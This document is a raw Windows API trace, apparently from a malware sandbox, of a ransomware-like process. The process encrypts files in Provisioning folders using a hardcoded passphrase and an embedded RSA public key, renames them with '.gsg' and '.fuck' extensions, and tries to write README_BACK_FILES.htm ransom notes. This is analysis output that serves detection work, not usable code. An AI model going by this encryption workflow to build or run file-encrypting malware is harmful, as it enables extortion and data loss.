[0240.314] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.314] CryptHashData (hHash=0x28e88b8, pbData=0x28cb5f8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.314] CryptDeriveKey (in: hProv=0x28f6788, Algid=0x6610, hBaseData=0x28e88b8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x28e6c78) returned 1 [0240.314] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.314] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0240.314] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x28f6238) returned 1 [0240.315] CryptImportPublicKeyInfo (in: hCryptProv=0x28f6238, dwCertEncodingType=0x1, pInfo=0x28c7ac8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c7af8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c7b00*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x28e6eb8) returned 1 [0240.315] CryptEncrypt (in: hKey=0x28e6eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0240.315] CryptEncrypt (in: hKey=0x28e6eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f6b40*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x28f6b40*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0240.315] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f6b40, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.315] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d204*=0x0, lpOverlapped=0x0) returned 0 [0240.315] CryptEncrypt (in: hKey=0x28e6c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x10) returned 1 [0240.315] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0) returned 0 [0240.316] CloseHandle (hObject=0xffffffff) returned 1 [0240.316] CloseHandle (hObject=0xffffffff) returned 1 [0240.316] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0240.316] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0240.317] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0240.317] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0240.319] CryptDestroyHash (hHash=0x28e88b8) returned 1 [0240.319] CryptDestroyKey (hKey=0x28e6c78) returned 1 [0240.319] CryptReleaseContext (hProv=0x28f6788, dwFlags=0x0) returned 1 [0240.319] FindNextFileA (in: hFindFile=0x28e8638, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0240.319] FindClose (in: hFindFile=0x28e8638 | out: hFindFile=0x28e8638) returned 1 [0240.319] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0240.319] AreFileApisANSI () returned 1 [0240.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28f6a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 117 [0240.319] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.320] GetLastError () returned 0x5 [0240.320] GetLastError () returned 0x5 [0240.320] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0240.320] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0240.320] GetLastError () returned 0x5 [0240.320] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml")) returned 0x20 [0240.321] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0240.321] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.321] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.322] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.322] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28f62c0) returned 1 [0240.325] CryptCreateHash (in: hProv=0x28f62c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0240.325] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.325] CryptHashData (hHash=0x28e8638, pbData=0x28cb828, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.325] CryptDeriveKey (in: hProv=0x28f62c0, Algid=0x6610, hBaseData=0x28e8638, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28e6d38) returned 1 [0240.325] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY------", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.325] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0240.325] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28f6ef8) returned 1 [0240.326] CryptImportPublicKeyInfo (in: hCryptProv=0x28f6ef8, dwCertEncodingType=0x1, pInfo=0x28c8968*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c8998*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c89a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28e6e78) returned 1 [0240.326] CryptEncrypt (in: hKey=0x28e6e78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0240.326] CryptEncrypt (in: hKey=0x28e6e78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f61b0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28f61b0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0240.326] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f61b0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.326] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0240.326] CryptEncrypt (in: hKey=0x28e6d38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0240.326] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0240.326] CloseHandle (hObject=0xffffffff) returned 1 [0240.326] CloseHandle (hObject=0xffffffff) returned 1 [0240.326] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0240.327] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0240.327] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml.gsg")) returned 0 [0240.328] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime.xml.fuck")) returned 0 [0240.328] CryptDestroyHash (hHash=0x28e8638) returned 1 [0240.328] CryptDestroyKey (hKey=0x28e6d38) returned 1 [0240.328] CryptReleaseContext (hProv=0x28f62c0, dwFlags=0x0) returned 1 [0240.328] FindNextFileA (in: hFindFile=0x28e8578, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0240.328] FindClose (in: hFindFile=0x28e8578 | out: hFindFile=0x28e8578) returned 1 [0240.329] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\readme_back_files.htm")) returned 0xffffffff [0240.329] AreFileApisANSI () returned 1 [0240.329] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e28c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 109 [0240.329] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.329] GetLastError () returned 0x5 [0240.329] GetLastError () returned 0x5 [0240.329] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0240.329] FindClose (in: hFindFile=0x28e84f8 | out: hFindFile=0x28e84f8) returned 1 [0240.330] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\readme_back_files.htm")) returned 0xffffffff [0240.330] AreFileApisANSI () returned 1 [0240.330] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 104 [0240.330] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.330] GetLastError () returned 0x5 [0240.330] GetLastError () returned 0x5 [0240.330] FindNextFileA (in: hFindFile=0x28bf1d8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0240.330] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28e84f8 [0240.331] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.331] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.331] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.331] GetLastError () returned 0x5 [0240.331] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml")) returned 0x20 [0240.331] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0240.332] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.332] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.332] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0240.333] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28f6ab8) returned 1 [0240.336] CryptCreateHash (in: hProv=0x28f6ab8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0240.336] lstrlenA (lpString="vRgdNNYVqmqYhuRsPDBqYcdgzMlQm") returned 29 [0240.336] CryptHashData (hHash=0x28e8578, pbData=0x28cba08, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0240.336] CryptDeriveKey (in: hProv=0x28f6ab8, Algid=0x6610, hBaseData=0x28e8578, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28e8638) returned 1 [0240.336] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0240.336] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0240.336] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28f7008) returned 1 [0240.336] CryptImportPublicKeyInfo (in: hCryptProv=0x28f7008, dwCertEncodingType=0x1, pInfo=0x28c7788*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28c77b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28c77c0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28e7178) returned 1 [0240.336] CryptEncrypt (in: hKey=0x28e7178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0240.337] CryptEncrypt (in: hKey=0x28e7178, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28f6018*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28f6018*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0240.337] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28f6018, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.337] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0240.337] CryptEncrypt (in: hKey=0x28e8638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0240.337] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0240.337] CloseHandle (hObject=0xffffffff) returned 1 [0240.337] CloseHandle (hObject=0xffffffff) returned 1 [0240.337] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml"), bFailIfExists=0) returned 0 [0240.338] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0240.338] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.gsg")) returned 0 [0240.338] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\customizations.xml.fuck")) returned 0 [0240.339] CryptDestroyHash (hHash=0x28e8578) returned 1 [0240.339] CryptDestroyKey (hKey=0x28e8638) returned 1 [0240.339] CryptReleaseContext (hProv=0x28f6ab8, dwFlags=0x0) returned 1 [0240.339] FindNextFileA (in: hFindFile=0x28e84f8, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0240.339] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0240.339] GetLastError () returned 0x5 [0240.339] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml")) returned 0x20 [0240.339] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0240.340] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0240.340] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Provisioning\\{f11899f2-71ec-4621-9997-e17ae2f6eb26}\\MasterDatastore.xml.gsg" (normalized: 